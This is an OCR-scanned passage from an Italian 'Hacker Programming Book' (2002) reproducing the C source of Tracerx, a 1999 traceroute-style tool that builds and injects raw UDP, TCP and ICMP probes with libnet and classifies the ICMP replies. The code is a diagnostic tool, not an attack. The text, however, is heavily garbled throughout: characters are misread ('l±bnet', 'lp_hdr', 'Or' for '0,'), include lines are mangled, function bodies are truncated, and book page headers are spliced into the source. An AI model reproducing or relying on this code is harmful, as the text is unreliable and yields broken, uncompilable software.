* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 



#if (HAVE_CONFIG_H) 
^include "./config.h" 



. /tx_main . h " 

. /tx_error . h " 

. /tx_struct . h " 

. /tx_framework . h " 

. /tx_packet_inject . h " 

. /tx_packet_capture . h " 



int 

tx_packet_build _probe (struct tx_control **tx_c) 
{ 

int 1, c; 

u_char errbuf [BUFSIZ] ; 

struct ether_addr *local_mac, *remote_mac; 

u_char DEBUG_ETHER [6] = {0x00, 0x10, 0x4b, 0x6b, 0x3c, 0x16}; 
/* 

* Get the link layer addresses we '11 need — the locai address of the 

* outgoing interface and remote address of the host in question (this 

* will actually be the first hop router) . 
*/ 

c = tx_get_hwaddrs (&local_mac, Sremote_mac, tx_c, errbuf); 
if (c == -1) 

{ 
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tx_error (FATAL, " tx_get_hwaddrs could not get an address %s.\n", 
errbuf) ; 



*/ 



/* 

* Bulld the ethernet header portlon of the packet . 
*/ 

l±bnet_bu±ld_ethernet ( DEB UG_ETHER/ *remote_ma c . ether_addr_octet */, 
local_mac->ether_addr_octet , 
ETHERTYPE_IP , 



NULL, 
0, 

(*tx_c) ->tx _packet) ; 



/* This is an IP packet 

/* No payload */ 
/* No payload */ 
/* packet memory */ 



*/ 



/* 

* Bulld the IP header portlon of the packet . 
*/ 

libnet_build_ip ( (*tx_c) ->packet_size - IP_H, 
(*tx_c) ->ip_tos , 
(*tx_c) ->ld, 
(*tx_c) ->lp_df, 

(*tx_c) ->current_ttl, 
(*tx_c) ->protocol, 
(*tx_c) ->sln . sln_addr. s_addr, 
(*tx_c) ->host, 
NULL, 
0, 

(*tx_c)->tx _packet + ETH_H) ; 



/* IP packetlength */ 
/* IP type of servi ce */ 
/* IP id */ 

/* IP fragmentation bits 

/* IP tinte to live */ 
/* transport protocol */ 
/* source IP address */ 
/* destination IP */ 
/* IP payload */ 
/* IP payload size */ 
/* packet memory */ 



/* 

* Build the transport header and payload portion of the packet . 
*/ 

switch ( (*tx_c) ->protocol) 
{ 

case IPPROTO_UDP: 

tx_packet_build_udp (tx_c) ; 

break; 
case IPPROTO_TCP : 

tx_packet_build_tcp (tx_c) ; 

break; 
case IPPROTO_ICMP : 

tx_packet_build_icmp (tx_c) ; 

break; 
de fault: 

tx_error (FATAL, "Unknown transport protocol\n") ; 

} 

libnet_do_checksum( (*tx_c) ->tx_packet + ETH_H, IPPROTO_IP, IP_H) ; 



int 

tx_packet_build_udp (struct tx_control **tx_c) 
{ 

libnet_build_udp ( (*tx_c) ->initial_sport, /* source UDP port */ 

(*tx_c) ->initial_dport, /* dest UDP port */ 

NULL, /* payload (copied 

later) */ 

/* The UDP header needs to know the payload size. */ 
(*tx_c) ->packet_size - IP_H - UDP_H, 

(*tx_c) ->tx_packet + ETH_H + IP_H) ; /* packet memory */ 

tx_packet_build _payload (tx_c , UDP_H) ; 

libnet_do_checksum( (*tx_c) ->tx_packet + ETH_H, IPPROTO_UDP, 
(*tx_c) ->packet_size - IP_H) ; 
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Int 

tx__packet_build_tcp (struct tx_control **tx_c) 
{ 

llbnet_bulld_tcp ( (*tx_c) ->±n±t±al_sport , 
(*tx_c) ->initial_dport , 
libnet_get_prand (PRu32) , 
OL, 

TH_SYN, 

1024, 

0, 

NULL, 



later) */ 



0 r 

(*tx_c) ->tx_packet + ETH_H + IP_H) ; 



/* source TCP port */ 
/* dest TCP port */ 
/* sequence number */ 
/* ACK number */ 
/* control flags */ 
/* window slze */ 
/* urgent */ 
/* payload (do thls 

/* later */ 

/* packet memory */ 



tx__packet_bulld _payload(tx_c, TCP_H) ; 



llbnet_do_checksum( (*tx_c) ->tx_packet + ETH_H, IPPROTO_TCP, 
(*tx_c) ->packet_slze - IP_H) ; 



int 

tx_packet_bulld_lcmp (struct tx_control **tx_c) 
{ 

libnet_build_lcmp_echo (ICMP_ECHO, 
0, 

Or 
Or 

NULL, 

Or 

(*tx_c) ->tx_packet + ETH_H + IP_H) ; 
tx_packet_bulld _payload (tx_c , ICMP_ECHO_H) ; 



libnet_do_checksum( (*tx_c) ->tx_packet + ETH_H, IPPROTO_ICMP , 
(*tx_c) ->packet_slze - IP_H) ; 



int 

tx_packet_bulld _payload (struct tx_control **tx_c, Int p_hdr_slze) 
{ 

struct tlmeval tlmeO; 
struct tx _payload *p; 
struct libnet_lp_hdr *lp_hdr; 
int payload_offset; 

/* 

* The payload Is just beyond the transport header. 
*/ 

payload_offset = ETH_H + IP_H + p_hdr_slze; 

if (gettlmeofday (StlmeOr NULL) == -1) 
{ 

tx_error (FATAL, "Can't get timing informatlon\n") ; 

} 

lp_hdr = (struct llbnet_lp_hdr *) ( (*tx_c) ->tx _packet + ETH_H) ; 
p = (struct tx_payload *) ( (*tx_c) ->tx _packet + payload_offset) ; 

/* 

* Thls fleld is pretty much deprecated slnce we can keep track of 

* packets by controlllng the ip_ld fleld, somethlng traceroute could 

* not do . 
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p->seg = 0; 
/* 

* TTL packet left with. 
*/ 

p->ttl = ip_hdr->ip_ttl; 
/* 

* RTT Information. 
*/ 

p->tv = timeO; 

} 



int 

tx_packet_update_probe (struct tx_control **tx_c) 
{ 

struct libnet_ip_hdr *ip_hdr; 

lp_hdr = (struct llbnet_lp_hdr *) ( (*tx_c) ->tx _packet + ETH_H) ; 
/* 

* Tracerx wouldn 't be tracerx wlthout a monotonically increasing IP 

* TTL. 
*/ 

ip_hdr->ip_ ttl++; 

switch ( (*tx_c) ->protocol) 
{ 

case IPPROTO_TCP: 
{ 

struct l±bnet_tcp_hdr *tcp_hdr; 

tcp_hdr = (struct l±bnet_tcp_hdr *) ( (*tx_c)->tx _packet + ETH_H 
+ IP_H); 

If (! ( (*tx_c)->tx_flags & TX_STATIC_PORTS) ) 
{ 

/* 

* Increment destlnatlon port . 
*/ 

tcp_hdr->th_dport = htons (ntohs (tcp_hdr->th_dport ) + 1) ; 

} 

/* 

* Update the payload Information. 
*/ 

tx_packet_build _payload(tx_c, TCP_H) ; 
tcp_hdr->th_sum = 0; 

libnet_do_checksum( (*tx_c) ->tx_packet + ETH_H, IPPROTO_TCP, 
(*tx_c) ->packet_size - IP_H) ; 

break; 

} 

case IPPROTO_UDP : 
{ 

struct llbnet_udp_hdr *udp_hdr; 

udp_hdr = (struct libnet_udp_hdr *) ( (*tx_c) ->tx _packet + ETH_H 
+ IP-H); 

if ( ! ( (*tx_c)->tx_flags & TX_STATIC_PORTS) ) 
{ 

/* 

* Increment destination port . 
*/ 

udp_hdr->uh_dport = htons (ntohs (udp_hdr->uh_dport) + 1) ; 

} 

/* 

* Update the payload Information. 
*/ 

tx_packet_build _payload(tx_c, UDP_H) ; 
udp_hdr->uh_sum = 0; 
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(*tx_c) ->packet_s±ze - IP_H) ; 

break; 

} 

case IPPROTO_ICMP : 
{ 

struct libnet_icmp_hdr *icmp_hdr; 

icmp_hdr = (struct libnet_lcmp_hdr *) ( (*tx_c) ->tx _packet + ETH_H 

+ iP-H); 

/* 

* Update the payload Information . 
*/ 

tx_packet_build__payload (tx_c , ICMP_ECHO_H) ; 
icmp_hdr->icmp_sum = 0; 

libnet_do_checksum( (*tx_c) ->tx_packet + ETH_H, IPPROTO_ICMP , 
(*tx_c) ->packet_size - IP_H) ; 

break; 

} 

de fault: 

tx_error (FATAL, "Unknown transport protocol\n") ; 

} 

ip_hdr->ip_sum = 0; 

libnet_do_checksum( (*tx_c) ->tx_packet + ETH_H, IPPROTO_IP, IP_H) ; 

} 




Il terzo file è tx_packet_inject.c 
/* 

* $Id: tx _packet_inject .c,v 1.3 1999/06/03 22:06:52 route Exp $ 
* 

* Tracerx 

* tx_packet_inject . c - high-level packet injection routines 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Jeremy F. Rauch <jrauch@cadre . org> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 

#if (HAVE_CONFIG_H) 
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iinclude " . /tx_struct .h" 
iinclude " . /tx_framework . h" 
iinclude " . /tx_error.h" 



int 

tx_packet_lnject(struct tx_control **tx_c) 
{ 

int n; 



n = libnet_write_link_layer ( 

(*tx_c) ->1, /* pointer to the link interface */ 

(*tx_c) ->device, /* the device to use */ 

(*tx_c) ->tx _packet, /* the packet to inject */ 

(*tx_c) ->packet_size + ETH_H) ; /* total packet size */ 

if (n != (*tx_c) ->packet_size + ETH_H) 
{ 

tx_error (CRITICAL, "Write error. Only wrote %d bytes\n" , n) ; 

} 




Il quarto file è tx_packet_verify.c 

/* 
* 

* Tracerx 

* tx_packet_verify.c - packet verification routines 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Jeremy F. Rauch <jrauch@cadre . org> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 



§if (HAVE_CONFIG_H) 
^include " ./config.h" 



iendif 

iinclude 

iinclude 

iinclude 

^include 



\/tx_struct.h" 
7 . /tx_framework . h ' 
' . /tx_error . h " 
. /tx_packet_capture . 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



int 

tx_packet_verify_udp (char *packet, struct tx_control **tx_c) 
{ 

struct libnet_ip_hdr *ip_hdr; 
struct libnet_icmp_hdr *icmp_hdr; 

±p_hdr = (struct l±bnet_±p_hdr *) (packet + ETH_H) ; 
/* 

* A UDP scan is only interested in ICMP packets (or possibly a UDP 

* packet — terminal case only) . 
*/ 

if (±p_hdr->±p_p '.= IPPROTO_ICMP SS lp_hdr->lp_p != IPPROTO_UDP) 
{ 

return (TX_PACKET_IS_BORING) ; 

} 

icmp_hdr = (struct libnet_icmp_hdr *) (packet + ETH_H + IP_H) ; 

switch (icmp_hdr->icmp_type) 
{ 

case ICMP_UNREACH : 
{ 

struct llbnet_lp_hdr *o_lp_hdr; 

if (ip_hdr->ip_src . s_addr == (*tx_c) ->host) 
{ 

/* 

* This is an unreachable packet front our destination host . 

* This has to be the terminal packet . The report module 

* will need to know if it ' s a regular port unreachable 

* message or perhaps some other type of unreachable . . 
*/ 

if (icmp_hdr->icmp_code == ICMP_UNREACH_PORT) 
{ 

return ( TX_PACKET_IS_ TERMINAL) ; 

} 

else 
{ 

return (TX_PACKET_IS_TERMINAL_EXOTIC) ; 

} 

} 

/* 

* Point to the originai IP header inside the ICMP message ' s 

* payload. 
*/ 

o_ip_hdr = (struct libnet_ip_hdr *) (packet + ETH_H + IP_H + 
ICMP_UNREACH_H) ; 

if (ntohs (o_ip_hdr->ip_id) == (*tx_c) ->id SS 
o_ip_hdr->ip_src . s_addr == 
(*tx_c) ->sin . sin_addr. s_addr) 

{ 

/* 

* The originai IP header was sent by this host and 

contains 

* our special ID field, so it's almost positively ours. 
*/ 

return (TX_PACKET_IS_UNREACH_EN_ROUTE) ; 

} 

else 
{ 

return (TX_PACKET_IS_BORING) ; 

} 

break; 
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case ICMP_TIMXCEED : 

break; 
de fault : 

return (TX_PACKET_IS_BORING) ; 

} 

} 



Int 

tx_packet_verlfy_tcp (char *packet, struct tx_control **tx_c) 

{ 

} 



int 

tx_packet_verlfy_lcmp (char *packet, struct tx_control **tx_c) 




Proseguiamo con il quinto file tx_packet_filter.c 
/* 

* $Id: tx _packet_f±lter.c,v 1.1 1999/06/03 22:06:52 route Exp $ 
* 

* Trace rx 

* tx_packet_fllter.c - packet fllterlng routlnes 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Jeremy F. Rauch <jrauch@cadre . org> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS * ~AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 

#if (HAVE_CONFIG_H) 
iinclude "./config.h" 
tendi f 

^include " . /tx_struct .h" 
^include " . /tx_error.h" 
^include " . /tx_main.h" 
^include " . /tx__packet_filter.h" 
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tx_set_pcap_f±lter(char *f±lter, struct tx_control **tx_c) 
{ 

struct bpf_program fllter_code; 
bpf_u_lnt32 local_net, netmask; 
char err_buf [BUFSIZ] ; 

/* 

* We need the subnet mask to apply a fllter. 
*/ 

if (pcap_lookupnet ( (*tx_c) ->device, &local_net, Snetmask, err_buf) == - 

1) 

{ 

tx_error (CRITICAL, "pcap_lookupnet : ", err_buf) ; 
return (-1) ; 

} 

/* 

* Compile the filter into bpf machine code. 
*/ 

if (pcap_compile ( (*tx_c) ->p, &filter_code, filter, 1, netmask) == -1) 
i 

tx_error (CRITICAL, "pcap_compile failed for some reason\n") ; 
sprint f (err_buf , "unknown error\n") ; 
return (-1) ; 

} 

/* 

* Compile the filter into bpf machine code. 
*/ 

if (pcap_setfilter ( (*tx_c) ->p, &filter_code) == -1) 
{ 

tx_error (CRITICAL, "pcap_set filter : ", err_buf) ; 
return (-1) ; 

} 

return (1) ; 



Il sesto file tx_packet_capture.c 
/* 

* $Id: tx _j>acket_capture.c,v 1.2 1999/06/03 22:06:52 route Exp $ 
* 

* Trace rx 

* tx_packet_capture . c - high-level packet capturing routines 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Jeremy F. Rauch <jrauch@cadre . org> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 
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* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 

#if (HAVE_CONFIG_H) 
^include " . /conflg . h" 
Itendif 

^include " . /tx_struct .h" 
^include " . /tx_framework . h" 
^include " . /tx_error.h" 
^include " . /tx_packet_capture . h " 

int 

tx_packet_snatcher (struct tx_control **tx_c) 
{ 

int n; 

u_char *packet; 

struct pcap _pkthdr pc_hdr; 

/* 

* Temporary looping construct until paralisi code is in place. 
*/ 

for (; packet = (u_char *) pcap_next ( (*tx_c) ->p, &pc_hdr) ; ) 
{ 

/* 

* Submit packet for verification based on scan type. 
*/ 

switch ( (*tx_c) ->protocol) 
{ 

case IPPROTO_UDP : 

n = tx_packet_verify_udp (packet, tx_c) ; 

break; 
case IPPROTO_TCP : 

n = tx_packet_verify_tcp (packet, tx_c) ; 

break; 
case IPPROTO_ICMP : 

n = tx_packet_verify_icmp (packet, tx_c) ; 

break; 

} 

/* 

* Process the response front the verifier. 
*/ 

switch (n) 
{ 

case -1 : 

/* an error occured */ 
case TX_PACKET_IS_BORING: 

/* not something we are not interested in */ 

break; 

case TX_PACKET_IS_EXPIRED : 

tx_report (TX_PACKET_IS_EXPIRED, packet, tx_c) ; 
break; 

case TX_PACKET_ IS_ TERMINAL : 

tx_report (TX_PACKET_IS_TERMINAL, packet, tx_c) ; 
break; 

case TX_PACKET_ IS_ TERMINAL_EXOTIC : 

tx_report (TX_PACKET_IS_TERMINAL_EXOTIC, packet, tx_c) ; 
break; 

case TX_PACKET_IS_UNREACH_EN_ROUTE : 

tx_report (TX_PACKET_IS_UNREACH_EN_ROUTE, packet, tx_c) ; 

break; 
de fault: 
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/* EOF */ 

IH MAIN è dentro al file txjnain.c : 
/* 

* $Id: tx_maln.c,v 1.3 1999/06/03 22:06:52 route Exp $ 
* 

* Tracerx 

* tx_main.c - mairi control logie 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Jeremy F. Ranch <jrauch@cadre . org> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS * ~AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 



#if (HAVE_CONFIG_H) 
^include "./config.h' 
tiendif 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 



. /tx_main . h " 
./tx_util.h" 
. /ver sion . h " 
. /tx_struct . h " 
. /tx_error . h " 
. /tx_framework . h " 



int 

mainfint arge, char *argv[]) 
{ 

int c, 

have_protocol ; 
u_char err_buf [BUFSIZ] ; 
struct tx_control *tx_c; 



/* Mediates combined usage of -I and -P */ 



/* 

* Need to be root to open link layer devi ce s . 
*/ 

if (geteuid() && getuid()) 
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tx_error (FATAL, "Pony up the prlvledgez (UID or EIUD == 0).\n"); 

} 

/* 

* Inltlallze control structure. This structure is used by just about 

* every function in the program. 
*/ 

if (tx_in±t_control (&tx_c) == -1) 
{ 

tx_error (FATAL, "tx_±n±t_control %s\n", strerror (ermo) ) ; 

} 

/* 

* Process commandline arguments . 
*/ 

have_protocol = 0; 

whlle ( (c = getopt (argc, argv, "dFHhlnrvxf : g: i :m:P :p : q: Ss :t :w:Vv" ) ) ! = 

EOF) 

{ 

swltch (c) 
{ 

case 'b ' : 

/* Select burst rate */ 

tx_c->burst_rate = tx_str21nt (optarg, "burst rate", 1, 
BURST_RATE_MAX) ; 
case 'D ' : 

/* Set base TCP/UDP destlnation port number */ 
tx_c->±n±t±al_dport = tx_str2int (optarg, "Inltlal dest 

port ", 

1, PORT_MAX) ; 
break; 
case 'd' : 

/* Socket level debugging (SO_DEBUG) */ 
/* NOOP */ 
break; 
case 'F ' : 

/* Set IP_DF (don't fragment) bit */ 
tx_c->ip_df = IP_DF; 
break; 
case •£': 

/* Set initial (first) IP TTL */ 

tx_c->current_ttl = tx_str2int (optarg, "initial TTL", 1, 
IP_TTL_MAX) ; 

break; 
case 'g' : 

/* Loose source routing */ 

/* NOOP */ 

break; 
case ' H ' : 

/* Verbose help */ 

/* WRITEME */ 
case 'h ' : 

/* Help */ 

usage (argv[ 0] ) ; 
case 'I': 

/* Use ICMP */ 

/* Set transport protocol and transport header size */ 
/* Overruled by -P */ 
if (!have __protocol) 
{ 

tx_c->protocol = tx _prot_select ("ICMP", &tx_c) ; 

} 

break; 
case ' i ' : 

/* Interface */ 
tx_c->device = optarg; 
break; 
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/* Max IP ttl */ 

tx_c->max_ttl = tx_str2±nt (optarg, "max TTL", 1, 
IP_TTL_MAX) ; 

break; 
case 'n ' : 

/* Do not resolve hostnames */ 

tx_c->use_name = 0; 

break; 
case 'P ' : 

/* Set transport protocol and transport header slze */ 
/* (supercedes -I) */ 

tx_c->protocol = tx _prot_select (optarg, &tx_c) ; 
have_protocol = 1; 
break; 
case 'p ' : 

/* Set base TCP/UDP destlnatlon port number */ 
tx_c->lnltlal_dport = tx_str2±nt (optarg, "Inltlal dest 

port ", 

1, PORT_MAX) ; 
break; 
case 'q': 

/* Number of probes (querles) */ 

tx_c->probe_cnt = tx_str2int (optarg, "probe cnt", 1, 
PROBE_MAX) ; 

break; 
case 'r': 

/* Bypass routlng sockets */ 

/* NOOP */ 

break; 
case 'S': 

/* Do not Increment TCP/UDP port numbers (static) */ 
tx_c->tx_flags /= TX_STATIC_PORTS ; 
break; 
case 's': 

/* Set base TCP/UDP source port number */ 
tx_c->±n±t±al_sport = tx_str2int (optarg, "inltlal source 

port ", 

1, PORT_MAX) ; 
break; 
case •t' : 

/* Set IP_TOS (type of servlce) blts */ 
tx_c->lp_tos = tx_str21nt (optarg, "IP tos", 0, 255); 
break; 
case 'V : 

/* Version Information */ 

fprintf (stderr, " \n %s \n version %s\n", BANNER, version); 

exit (EXIT_SUCCESS) ; 
case 'v' : 

/* Verbose output */ 

tx_c->verbose = 1; 

break; 
case ' x ' : 

/* Toggle checksums */ 

/* NOOP */ 

break; 
case 'w' : 

/* Time to wait (in seconds) */ 

tx_c->reading_wait = tx_str2int (optarg, "read wait", 2, 

WAIT_MAX) ; 
break; 
de fault: 

usage (argv[ 0] ) ; 

} 

} 

/* 

* Parse the command line for the destination host and possible 
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V 

switch (argc - optlnd) 
{ 

case 2: 
/* 

* User speclfled packetlength (optional) . This will later 

* be verified and adjusted if necessary . 
*/ 

tx_c->packet_s±ze = tx_str2int (argv[optind + 1] , "packet 

length", 

PACKET_MIN, PACKET_MAX) ; 
/* FALLTHROUGH */ 
case 1 : 

/* Host (required) . */ 

tx_c->host = l±bnet_name_resolve (argv[optind] , 1) ; 

if (tx_c->host == -1) 

{ 

tx_error (FATAL, "Cannot resolve host IP address\n") ; 

} 

break; 
de fault: 

usage (argv[ 0 ] ) ; 

} 

/* 

* Bring up the network components . 
*/ 

if (tx_init_network (&tx_c, err_buf) == -1) 
{ 

tx_error (FATAL, "Cannot initialize the network: %s\n", err_buf); 

} 

/* 

* Start the game! 
*/ 

tx_do_scan (&tx_c) ; 
/* 

* Stop the game! 
*/ 

tx_shutdown (&tx_c) ; 
return (EXIT_SUCCESS) ; 

} 



void 

usage (char *argvO) 
{ 

fprintf (stderr, 

"\nUsage : %s [options] host [packetlength] \n" 



'\t\t 


[-b] 


burst rate\n" 


•\t\t 


[-F] 


IP_DF\n" 


'\t\t 


l-f] 


base IP TTL\n " 


'\t\t 


l-gl 


loose source routing\n" 


'\t\t 


l-H] 


verbose help \n" 


•\t\t 


l-hj 


help\n" 


'\t\t 


[-i] 


use ICMP\n" 


'\t\t 


[-H 


speci fy interface\n" 


'\t\t 


[-m] 


max IP TTL (hopcount) \n" 


•\t\t 


l-n] 


do not resolve IP addresses into hostnames\n" 


'\t\t 


l-P] 


transport protocol (supercedes -I)\n" 


'\t\t 


l-pl 


base TCP/UDP port number (destination) \n" 


'\t\t 


l-ql 


number of probes\n" 


•\t\t 


[S] 


do not increment TCP/UDP port numbers (static) \n 


•\t\t 


l-s] 


base TCP/UDP port number (source) \n " 


'\t\t 


l-tl 


IP TOS\n" 
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"\t\t [~v] verbose output \n" 
"\t\t [~w] walt (in seconds)\n" 
"\n", argvO) ; 




Il file tx_report.c : 
/* 

* $Id: tx_report.c,v 1.1.1.1 1999/05/28 23:55:06 route Exp $ 
* 

* Tracerx 

* tx_report . c - reporting and prlntlng module 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Jeremy F. Rauch <jrauch@cadre . org> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

